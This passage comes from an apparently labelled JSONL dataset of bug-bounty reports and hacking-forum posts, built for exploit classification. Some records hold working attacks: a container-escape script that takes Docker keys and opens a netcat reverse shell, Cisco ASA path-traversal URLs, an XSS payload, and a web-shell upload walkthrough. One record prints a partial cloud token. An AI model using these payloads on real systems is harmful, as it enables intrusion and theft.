openssl x509 -noout -text | perl -l -0777 -ne '@names=/\\bDNS:([^\\s,]+)/g; print join(\"\\n\", sort @names);'\n\n█████████\n```\n\n 3. Now visit the application: https://█████\n 4. You'll see that you can now use the application as an authenticated user by clicking through the sidebar:\n\n███\n\nYou can search through past messages / updates on aircraft and missles here: \n\nhttps://███/Guest/MessageSearch.aspx\n\n## Impact\n\nCritical. A remote, unauthenticated attacker can view and download confidential information from this application. For instance, I clicked on one of the messages at https://████████/Guest/MessagesDetails.aspx and it downloaded a document containing sensitive information about some issues with some██████████:\n\n█████████\n\n████████\n\n\nBest,\nCorben Leo (@cdl)", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-04-14", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "f90bea2446146ea820a4", "text": "Awesome challenge so far, I have to agree with others that the biggest hustle was finding where to inject command. There is no need to base64 encode anything if you don’t want. Feel free to PM me if you are stuck.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2023-10-06", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "f20b45ea40bc2eba779b", "text": "[Improper Access Control - Generic] Huge amount of Subdomains Takeovers at Reddit.com\n\n**NOTE:** Please Don't close this Report as Informative/NA or Dup.\n\nHello Reddit team regards,\n\nI got huge amount of Subdomain Takeovers at Reddit:\n\nPoc Video is attached.\n\n## Impact\n\nSubdomain Takeovers at Reddit", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-05-18", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "61ae1b8d5b80c3b47531", "text": "[Weak Password Recovery Mechanism for Forgotten Password] No length on password\n\nHey, when I try to set the password while creating an account I noticed that you haven't kept any password limit. \n\nYou need to decrease password length: There are two reasons for limiting the password size. For one, hashing a large amount of data can cause significant resource consumption on behalf of the server and would be an easy target for a Denial Of Service attack.\n\nNormally all sites have a password minimum to maximum lengths like 72 characters limit or 48 limits to prevent Denial Of Service attack. in my SQL but in the website registration page, there are no limitations. Let me know if you need any more details.\n\nVulnerable Domain:https://imgur.com/\n==========\n\nThis is typically not DoS, but a vulnerability that may lead to a DoS attack.\n\nThe password I tried is:\n\nT12345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-01-24", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "a180faec44128783128d", "text": "[Information Disclosure] CVE-2022-27775: Bad local IPv6 connection reuse\n\n## Summary:\ncurl/libcurl doesn't consider IPv6 address zone index when doing connection reuse. if connection exists to specific IPv6 address (and other conditions for connection reuse are fulfilled) it will be reused for connections regardless of the zone index.\n\n## Steps To Reproduce:\n\n 1. Set up a fake server: `echo -ne 'HTTP/1.1 200 OK\\r\\nContent-Length: 6\\r\\n\\r\\nHello\\n' | nc -6 -v -l -p 9999`\n 2. curl \"http://[ipv6addr]:9999/x\" \"http://[ipv6addr%25lo]:9999/y\"\n\nBoth connections arrive to the test server:\n\n```\nListening on :: 9999\nConnection received on somehost someport\nGET /x HTTP/1.1\nHost: [ipv6addr]:9999\nUser-Agent: curl/7.83.0-DEV\nAccept: */*\n\nGET /y HTTP/1.1\nHost: [ipv6addr]:9999\nUser-Agent: curl/7.83.0-DEV\nAccept: */*\n```\n\nClearly the 2nd connection should fail as the address is not available at interface lo. (Lone connection to `http://[ipv6addr%25lo]:9999/` fails with `curl: (7) Couldn't connect to server`)\n\nThis vulnerability isn't exploitable with public IPv6 addresses on linux systems (it seems kernel strips out zone index for public addresses). It is exploitable with macOS however, and possibly other non-linux OSes.\n\n## Impact\n\nReuse of wrong connection leading to potential disclosure of confidential information.", "label": 2, "label_name": "actionable_exploit", "cve_ids": ["CVE-2022-27775"], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-04-29", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "10b7c3b097c70fb53a32", "text": "Hello stuck on Elasticity for 4–5 days, machine got reset I believe 1 day a go and still having the same issue connecting to the official standard port and another a bit above timing out… can someone PM me see if this is the right way because if not at least I can change my approach. Thanks", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2023-01-17", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "6fd95e183d6010bb1dc1", "text": "[Code Injection] [hta3] Remote Code Execution on https://███ via improper access control to SCORM Zip upload/import\n\n## Summary:\nThere is a Remote Code Execution vulnerability at https://█████████/Kview/CustomCodeBehind/base/courseware/scorm/management/scorm2004uploadcourse.aspx which allows any user to upload a SCORM course package. Furthermore, an attacker can add an ASPX shell to the SCORM package which will then get extracted onto the server, where the attacker can then execute commands.\n\n## Steps To Reproduce:\n\n 1. Visit `https://███████/` and log in with the credentials: `██████████`\n 2. Now download this \"malicious\" SCORM course package: █████\n 3. If you `unzip scorm.zip`, you will notice this is a valid SCORM [package](https://scorm.com/scorm-explained/technical-scorm/content-packaging/), and you will also notice that I've included an ASPX file in `shared/cdlcdlcdl.aspx` which runs the `whoami` command. Notice I also included that file reference in the Scorm Manifest (`imsmanifest.xml`)\n4. Visit https://████████/Kview/CustomCodeBehind/base/courseware/scorm/management/scorm2004uploadcourse.aspx, select the ██████ file. Start **intercepting** in Burp Suite Repeater. \n5. Forward the POST request to `/Kview/CustomCodeBehind/base/courseware/scorm/management/scorm2004uploadcourse.aspx`\n6. Now intercept the request to `/Kview/CustomCodeBehind/base/courseware/scorm/management/scorm2004editmetadata.aspx`\n7. Right-Click on it, Hover down to \"Do intercept\" and click \"response to this request\" then forward it. (In your web-browser you might be able to just right-click, inspect-element, and search for strCourseId in there but my browser was being funky).\n8. Once you've received the response, search for \"strCourseId\" and grab it.\n\nFor example, you would grab `F6BAC72B45D64B34ACB662BB001D8523` out of the following response:\n\n```html\n
Course Files\n```\n9. Now, visit `https://█████/CServer/Courseware//shared/cdlcdlcdl.aspx` and you will see the shell executes:\n\n███\n\n## Supporting Material/References:\n- https://█████/CServer/Courseware/F6BAC72B45D64B34ACB662BB001D8523/shared/cdlcdlcdl.aspx\n\n## Proof-of-Concept Video\n█████████\n\n## Impact\n\nCritical, an attacker can execute commands on this military server, steal sensitive information, pivot to internal systems, etc.\n\nBest,\n@cdcl", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-09-15", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "27f266aeea7a39e7fdd5", "text": "[Information Disclosure] Hackerone All Private Program Name Leaked to Public Via Collaborator OR Attacker can Easily Dump all Private Program Names through Collaborator\n\nHi Team,\n\nI hope you are doing well.\n\nI found a Critical Vulnerability using this attacker can easily dump all the private program names of Hackerone and it breaks the confidentiality because if attacker got name of the program Rest of the Data is not needed because it's googleable about the program.\n\nI found that Using Collaborator Feature attacker can easily got all Program's Names one by one or he can automate through Burp Intruder.\n\nSteps to Reproduce :- 1. Create a Report on Hackerone in which Collaboration is allowed.\n2. After creating it add a Random Collaborator and Capture this Request in Burp suite.\n3. In the Request there is `report_id` change this id to `2052164`.\n4. You got this error if program is Public :- \n\n█████\n\n5. Now change this `report_id` change this id to `2052163 , 2052158 , 2052154 , 2052162 , 2053029`.\n6. As these all `report_id ` belongs to private programs you got leaked Name of Private program Like :- \n\n██████\n\n█████████\n\n7. Attacker can easily Brute-Force through intruder and Dump the whole DB of Private Hackerone program Name this breaks the Confidentially of Private program because if Someone known name he can easily google and find it the information about it.\n\n## Impact\n\n1. Broken Confidentiality of Hackerone Feature about Private Programs.\n2. Attacker can easily dump all the Private program Names and it also breaks the Confidentiality between Hackerone and Client.\n\nPOC Attached\n\nIf you need further info I am here to help you.\n\nThanks and Regards,\nBhaRat", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-08-11", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "7704d3351a8753f45520", "text": "Custom In-Ear Monitors/Earphones?\n\nAnyone tried buying from this website? They are called Big Ear and they offer home service for molding your ears for custom in-ear monitors and then they'll mail the product within a few weeks. They make multiple(up to 8) transducer IEMs and that's what called my attention. They also do have instructions for DIY molding where they'll send a molding kit then you'll mold your ears and send back the kit with the molds... but I guess I'll opt out on that if ever because I don't want to F things up. LOL! Some of their products are really intriguing and of course, I'd love to know if anyone here tried their products or maybe tried products like theirs from another store. I mean, any of you got other recommendations?**Links removed by Site Administrator so it doesn't look like you're spamming us. Please don't post them again.** (you should be able to talk about this without naming names.)", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hacker_exploits", "forum_id": "antionline", "timestamp": "2022-03-09", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "29fb22f2156e50f607e3", "text": "[Unknown] Golang : Add Query To Detect PAM Authorization Bugs\n\nThis bug was reported directly to GitHub Security Lab.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-06-15", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "7ed556ae2db77ccedc35", "text": "[Open Redirect] Open redirect due to scanning QR code via brave browser\n\n> NOTE! Thanks for submitting a report! Please fill all sections below with the pertinent details. Remember, the more detail you provide, the easier it is for us to verify and then potentially issue a bounty.\n\n## Summary:\nThis vulnerability was discovered in Brave's QR code scanner, which allows users to read QR codes and open corresponding links. Exploitation of this vulnerability allows attackers to direct users to malicious sites without their consent or knowledge. This vulnerability can put the security of Brave users at risk and allow them to be exposed to phishing, phishing and malware attacks. In this report, we'll describe the vulnerability in more detail, assess its severity, and provide recommendations to address it.\n\n\n\n## Products affected: \n\nBrave 1.50.114, Chromium 112.0.5615.49 on Android 11; Build/RP1A.200720.011\n\n## Steps To Reproduce:\n\n{F2291837}\n\nThe QR code above is the one I generated to replicate the attack.\nTo create my QR code, I used the site https://app.qr-code-generator.com.\n I included a malicious link in this QR code. As an example link, I used www.evil.com\n\n# Steps To Reproduce\n\n - Open the browser \n- Then in your browser you can click on the \"scan a QR code\" option and scan the QR code in which I have included my malicious link. \nThis will automatically redirect you to the malicious site I inserted in the QR code, without even asking your opinion.\n- However, some QR code scanners do not automatically redirect the user to the malicious site, but rather display the link with the \"Go to site\" option. Other scanners don't even show this option. \n- However, in the case of Brave, the browser automatically redirects the user to the malicious site without their consent, which poses a significant security risk to users.\n\n\n## Supporting Material/References:\n\nhttps://resources.infosecinstitute.com/topic/security-attacks-via-malicious-qr-codes/\nhttps://shahjerry33.medium.com/open-redirection-qr-code-magic-18ace1a0170f\n\n## Impact\n\nHere are some potential business impacts that this security vulnerability could have in Brave 1.50.114, Chromium 112.0.5615.49 on Android 11; Build/RP1A.200720.011:\n\nThe fact that Brave's QR code scanner opens the link without the user's notice has a big impact on user security. This vulnerability allows an attacker to redirect a Brave user to a malicious site without the user being able to see the link and make an informed decision. This can lead to exposure to malware or phishing attacks that can compromise user data.\n\nThe actual impact depends on the nature of the malicious link to which the user is redirected. In the worst case, the link may be designed to steal sensitive information, such as credit card information, credentials, or other personal information. This can lead to loss of privacy and financial damage to the user.\n\nMoreover, if the user is redirected to a malicious site that contains malware, then it can compromise the security of the user's device and lead to loss of important data. Overall, the fact that Brave's QR code scanner automatically opens malicious links without user's notice poses a significant risk to user security and should be fixed as soon as possible.\n\n Increased Risk of Phishing: Exploiting this vulnerability could allow attackers to direct Brave users to malicious sites that can be used to steal sensitive information such as usernames, passwords, banking and other personal information.\n\n Exposure to malware: Malicious sites that users are redirected to may also contain malware that can infect Brave users' devices with malicious programs such as viruses, Trojans or ransomware.\n\n Privacy loss: Brave users may also be at risk of privacy loss if sensitive information is stolen as a result of the exploitation of this vulnerability.\n\n Loss of user trust: If Brave users fall victim to attacks as a result of exploiting this vulnerability, they may lose trust in the application and seek out more secure alternatives, which could impact reputation of the application an", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-06-08", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "26dc004a643308b15b0a", "text": "[Improper Authentication - Generic] Ability to connect an external login service for unverified emails/accounts at accounts.shopify.com\n\nHi,\n\n## Description\nI have found that it is possible to add external login service even if the email address is not verified. This allows someone to create an account with an email he does not own and create some kind of backdoor accounts that would allow him to get access to shops and more.\n\nIn the external login services of the profil, it is said that **You do not have an external login service connected to your Shopify ID. Please verify your email address to connect a login service.**. So one should not be able to connect and external login account if the email was not verified.\n\n{F1051426}\n\n## Steps de reproduce\n1. Create a new account at `partners.myshopify.com` with the victim email (saltymermaid+victim@wearehackerone.com)\n\n2. The account is created, now go to your profile at https://accounts.shopify.com/accounts/{account_id}`\n\n3. In the external login service section or anywhere else in the page, with your browser developper console, add the following HTML snippet `Connect to Google` and replace the **{victim_account_id}** with the victim's account id from the url.\n\n4. Now click on the link you injected in the page and it will bring you too the google account authentication page\n\n5. Connect to your google account or create a new one. You will be redirected to the victims account uppon success.\n\n6. Notice that the external login account was added even if the email was not verified.\n\n7. Now, on another browser, go to https://partners.shopify.com/organizations, enter the victims email address and notice that **Log in with Google** button is shown. You should be able to connect that the \"backdoor\" account.\n\n## Impact\n\nAbility to create backdoors login accounts via external login services for an account that was not verified could lead to important information disclosures. I think the chances of this happening are low since a victim would be carreful after receiving the shopify confirmation email but in somes cases, this could lead to important leak of informations.\n\nIf you need extra details, just le me know. I will make a POC video soon.\n\nThank you.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-04-13", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "d5c2628e2d26c42cc166", "text": "[Path Traversal] [CVE-2020-3452] Unauthenticated file read in Cisco ASA\n\ni found out that https://█████/ was vulnerable to CVE-2020-3452\n\nThe IP has a SSL certificate pointing to ██████████\ncurl -kv https://███████/\n\nOutput;\n```\nServer certificate:\n███\n```\n\n## Impact\n\nAnyone can read any file present on the server.\n\n## System Host(s)\n█████\n\n## Affected Product(s) and Version(s)\n\n\n## CVE Numbers\nCVE-2020-3452\n\n## Steps to Reproduce\nYou can test it by visiting the URL:\n1. https://█████████/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua\n2. https://█████/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../\n\n## Suggested Mitigation/Remediation Actions\nhttps://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86", "label": 2, "label_name": "actionable_exploit", "cve_ids": ["CVE-2020-3452"], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-05-12", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "8665d3baaa3642ffc478", "text": "[Improper Access Control - Generic] Container escape on public GitLab CI runners\n\n### Summary\n\nIt is possible to circumvent the isolation in place for build jobs running on public CI runners by escaping the docker container running the build job.\nThis is possible via abuse of the cgroup release_agent functionality, made possible by CI jobs being allowed to mount filesystems inside the container.\n\nFrom this host, I was able to spawn a root remote shell and run whatever I liked without restriction, including bypassing the iptables rules put in place to prevent access to the GCP metadata API. I was also able to gather sensitive data such as the instance token, GCP project ID and instance configuration, docker host TLS keys, firewall details, suricata configuration and user account names for the ops team, which could aid in further exploitation for a motivated attacker.\n\n### Steps to reproduce\n\n1. Sign up for a regular, free GitLab account.\n2. Create a new project.\n An example repo is here: https://gitlab.com/ec0bb/citest (made private)\n3. Add the below `.gitlab-ci.yaml`\n```\nimage: python:latest\nrun:\n script:\n - bash shell.sh\n```\n4. Add the below `shell.sh`\n```\nexport HOST=your.reverse.shell.box # customise this!\n\nmkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x\necho 1 > /tmp/cgrp/x/notify_on_release\nexport host_path=`sed -n 's/.*\\perdir=\\([^,]*\\).*/\\1/p' /etc/mtab`\necho \"$host_path/cmd\" > /tmp/cgrp/release_agent\n\ntouch /user/txt\ntouch /ca.pem\ntouch /server.pem\ntouch /server-key.pem\ntouch /ps.txt\necho '#!/bin/sh' > /cmd\necho \"whoami > $host_path/user.txt\" >> /cmd\necho \"ps uax > $host_path/ps.txt\" >> /cmd\necho \"cat /etc/docker/ca.pem > $host_path/ca.pem\" >> /cmd\necho \"cat /etc/docker/server.pem > $host_path/server.pem\" >> /cmd\necho \"cat /etc/docker/server-key.pem > $host_path/server-key.pem\" >> /cmd\necho \"mount -o bind /var/run/docker.sock $host_path/docker.sock\" >> /cmd\necho \"/usr/bin/nc $HOST 1337 -e /bin/sh &\" >> /cmd\nchmod a+x /cmd\n\nwhile test 1\ndo\n sh -c \"echo \\$\\$ > /tmp/cgrp/x/cgroup.procs\"\n sleep 60\ndone\n```\n5. Push the files to the repository.\n6. Enable CI/CD jobs on the repository, in case they aren't, using the `.gitlab-ci.yml` in the repository.\n7. Set up a reverse shell listener with `nc -lvp 1337` on the host you specified in the bash script above.\n8. Run the job\n\n### Impact\n\nBased on the host configuration, there is a clear expectation that CI jobs should not have access to the host, given the use of $DOCKER_USER in the firewall rules, and the configuration in place to prevent access to GCP metadata and host configuration in the way the container is configured. \n\nBeing able to break this confinement allows for unconstrained resource usage on the CI host, as well as access to GCP resources and also other hosts on the internal GCP network. It is also possible to disable iptables and suricata entirely - so arbitrary software and docker images can also be downloaded and run, to facilitate things like cryptocoin mining, something the host has been configured to try and prevent via iptables and suricata rules. This could be used by an attacker to consume significant compute resources in the form of bandwidth usage and compute time, given how easy it is to spin up multiple GitLab accounts, and to restart jobs programmatically when the maximum execution time is reached.\n\nI did not see any evidence of shared jobs in my testing, however if multiple jobs were scheduled on a dedicated runner (which I did not test) then this could also lead to a loss of confidentiality between jobs, as the full container configuration and contents are accessible once the container is escaped.\n\n### Examples\n\nRepo: https://gitlab.com/ec0bb/citest\n\nGCP access (albeit limited) -\n```\ncurl -H 'Metadata-Flavor:Google' http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token\n{\"access_token\":\"ya29.c.b0AXv0zTPHcDsuE3JOIVaFex7mGac13DuX3nI8XvoeSTANd0HfWmJ8BaTiE0P8GGRBVjOH3--Bangi4UVHqBpR7hLsfielnvZd5VWsRVM9xedCsFchJ1VlIl_RHRAgndu79QhAdEtquGQ9FVw8K_v-beS5zXMSh2DZNEfrUx6IgkAF3sk", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-04-27", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "d164de7e463be4f68e33", "text": "Cryptojacking: a hands-on guide for pentesters\n\nCryptojacking: a hands-on guide for pentesters Because attackers continuously devise new schemes for monetizing hacked machines, cryptojacking has emerged as one of the top ways for cybercriminals to turn hacks into cash. Read more: Learn Ethical Hacking and Penetration Testing Online – 2 May 22 Cryptojacking: a hands-on guide for pentesters using Monero (XMR) Step-by-step guide to cryptojacking with Monero (XMR) using realistic malware. Hands-on guide for pentesters to learn malicious cryptomining Est. reading time: 6 minutes", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackersploit", "forum_id": "hackersploit", "timestamp": "2022-05-05", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "024ee216ec85fff74232", "text": "[Deserialization of Untrusted Data] [CVE-2023-27531] Possible Deserialization of Untrusted Data vulnerability in Kredis JSON\n\nI made a report and patch at https://hackerone.com/reports/1702859 .\n\nhttps://discuss.rubyonrails.org/t/cve-2023-27531-possible-deserialization-of-untrusted-data-vulnerability-in-kredis-json/82467\n\n> There is a deserialization of untrusted data vulnerability in the Kredis JSON deserialization code. This vulnerability has been assigned the CVE identifier CVE-2023-27531.\n\n## Impact\n\n> Carefully crafted JSON data processed by Kredis may result in deserialization of untrusted data, potentially leading to deserialization of unexpected objects in the system.", "label": 2, "label_name": "actionable_exploit", "cve_ids": ["CVE-2023-27531"], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-08-15", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "cf031a1549f12e441463", "text": "[Information Disclosure] Sensitive information disclosure [HtUS]\n\n## Summary:\nHi Team :)\nI found that the server status directory on your system is open, it displays server status and sensitive information by server\n\n## Steps To Reproduce:\n[add details for how we can reproduce the issue]\n\n 1. visit: https://█████████/server-status/\n\n## Supporting Material/References:\n███\n\n * [attachment / reference]\n\n## Impact\n\nsensitive information is clearly displayed, that is, server status, attackers can find sensitive information from the server (server logs)", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-02-24", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "34b80070fb5e9ad0dd73", "text": "[Unknown] [Python]: CWE-079: HTTP Header injection\n\nThis bug was reported directly to GitHub Security Lab.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-01-19", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "51fde1e18d020bc07197", "text": "[Cross-site Scripting (XSS) - Reflected] XSS in www.glassdoor.com\n\n**Summary:**\nBrowser: Chrome\nAffected URL https://www.glassdoor.com/Location/All-Tesla-Office-Locations-E43129.htm?DIFFICULT=%3E%3Csvg%20onload%3d%26%23x00000000061;%26%23x0000000006c%26%23x0000000065%26%23x0000000072%26%23x00000000074(1%26%230000000000000041;%20%3C%2fscript%20\n\n## Steps To Reproduce:\n 1. Go to the affected URL\n\n## Supporting Material/References:\nAttached an image ███\n\n## Impact\n\nLeaking users data and and modify the webpage.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-09-16", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "91b26bcaf9ad7c93b2bb", "text": "You are in the right direction, before click on Move you must select tmp, after you can select Move and the URL will change like that ?to=tmp&from=696212415.txt&finish=1&move=1\" Now you can try to inject your payload, try to put another sub-shell before bash and try different operators,‘&’ ‘&&’ ‘|’ ‘||’ ‘$()’ ‘``’", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2023-11-03", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "e7c56ffa3c1100f4e148", "text": "[Improper Certificate Validation] CVE-2023-28321: IDN wildcard match\n\n## Summary:\ncurl /libcurl uses wildcards for validation during TLS communication, even if the hostname is an IDN.\nEven if wildcards are present in the CN/SAN of the certificate, they must not be used to match if the hostname is an IDN.\nThis is described in [RFC-6125, section 6.4.3.][RFC]\n[RFC]: https://datatracker.ietf.org/doc/html/rfc6125#section-6.4.3\nYou probably know that.\nHowever, there was a problem with the implementation.\n`lib/vtls/hostcheck.c` in the function 'hostmatch' on lines 100-106.\n\n```\n /* We require at least 2 dots in the pattern to avoid too wide wildcard\n match. */\n pattern_label_end = memchr(pattern, '.', patternlen);\n if(!pattern_label_end ||\n (memrchr(pattern, '.', patternlen) == pattern_label_end) ||\n strncasecompare(pattern, \"xn--\", 4))\n return pmatch(hostname, hostlen, pattern, patternlen);\n```\nI think `strncasecompare(pattern, \"xn--\", 4))` is `strncasecompare(hostname, \"xn--\", 4))`.\n`pattern` is a value that contains wildcards because it is CN/SAN.\nIn other words, it will not match \"xn--\" because it will be a string containing wildcards.\n\n## Steps To Reproduce:\n 1. Create a wildcard certificate.As an example, attach a certificate and private key with CN value of `x*.example.local`. {F2298301} {F2298300}\n 2. `openssl s_server -accept 443 -cert server.crt -key server.key -www`\n 3. Modify hosts so that the name resolution result of `xn--l8j.example.local‘ is the IP of your machine in order to perform the test in the local environment.\n4. `curl https://%E3%81%82.example.local --cacert server.crt`\n\nWhen the above is executed, the communication succeeds even though it should result in a validation error.\n\n## Impact\n\nImproper Validation of Certificate with Host Mismatch.", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": ["CVE-2023-28321"], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-05-18", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "273070262e530d8827b3", "text": "[Improper Input Validation] Moderators can send messages to users from banned subreddits via `oauth.reddit.com/api/mod/conversations`\n\n## Summary:\n\nIt is possible for moderators to send messages to users from a banned subreddit.\n\nI assume this is not intended considering that when trying to send a message as a banned subreddit via [reddit.com/message/compose](https://www.reddit.com/message/compose) (`from` field) you get a `200` response but the message is never delivered to the recipient.\n\n## Steps To Reproduce:\n\n1. While in [mod.reddit.com/mail/create](https://mod.reddit.com/mail/create), select a banned subreddit from the dropdown menu.\n2. Fill in all other fields and send the message.\n\n## Impact\n\nModerators can \"officially\" communicate with users even after the subreddit gets banned. This can be used to organize a new subreddit to migrate to in order to circumvent the ban.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-07-04", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "ee362c859bda54376a6a", "text": "[Insecure Direct Object Reference (IDOR)] Sensei LMS IDOR to send message\n\nHi there, hope you are doing great.\nSo, there is an option to send message to teacher privately by student on Sensei LMS.\nEach message sent by student will have different ID,\nStudent1 cannot access or send message to the message from Student2 (which is meant to be private with teacher)\nSimilarly Student2 cannot view/send message sent by student1 to the teacher.\n\nBut due to lack of access control, it is possible for any student to reply on any thread of Student to teacher just by simply changing ID of the thread which is numeric.\n\nThis may sound a bit complex but i will try to explain this with video POC, please let me know if you still didn't understood the vulnerability here:\n{F1759226}\n\n## Impact\n\nAny student can reply to other student's thread which is meant to be private between the original student [who sent message] and teacher.", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-08-04", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "4fc0a3d6df95afc456a0", "text": "[Cross-site Scripting (XSS) - Stored] Bypass: Stored-XSS with CSP-bypass via scoped labels' color\n\nHi team,\n\nThe [Stored-XSS with CSP-bypass via labels' color](https://hackerone.com/reports/1665658) has been mitigated in [Gitlab 15.3.2](https://about.gitlab.com/releases/2022/08/30/critical-security-release-gitlab-15-3-2-released/#stored-xss-via-labels-color). However it is not enough because it missed the case of [scoped label](https://gitlab.com/gitlab-org/gitlab/-/blob/85041966ed3eba23ee530a20c2eee374ef6e8617/ee/app/helpers/ee/labels_helper.rb#L33).\n\nI notified this missing in the [original report](https://hackerone.com/reports/1665658#activity-18273269) and @galfaro encouraged me to submit a new report about this.\n\n\n# Step to reproduce:\n\n- To reproduce, we need the following prerequisites:\n\n + [Scoped labels](https://docs.gitlab.com/ee/user/project/labels.html#scoped-labels) are available in Gitlab Premium, so we need a premium account that can be obtained via the [free trial](https://about.gitlab.com/free-trial/)\n + A Gitlab personal access token. Go [here](https://gitlab.com/-/profile/personal_access_tokens?name=test&scopes=api) to create a new token with within `api` scope.\n\n- Github does not allow to create arbitrary label colors. You can find in the attachment a dummy Github server in which we set a new label:\n + name: `yvvdwf::label-name` (the `::` to scope the label)\n + color: `\">yvvdwf-label\n \n \n\n\n### The 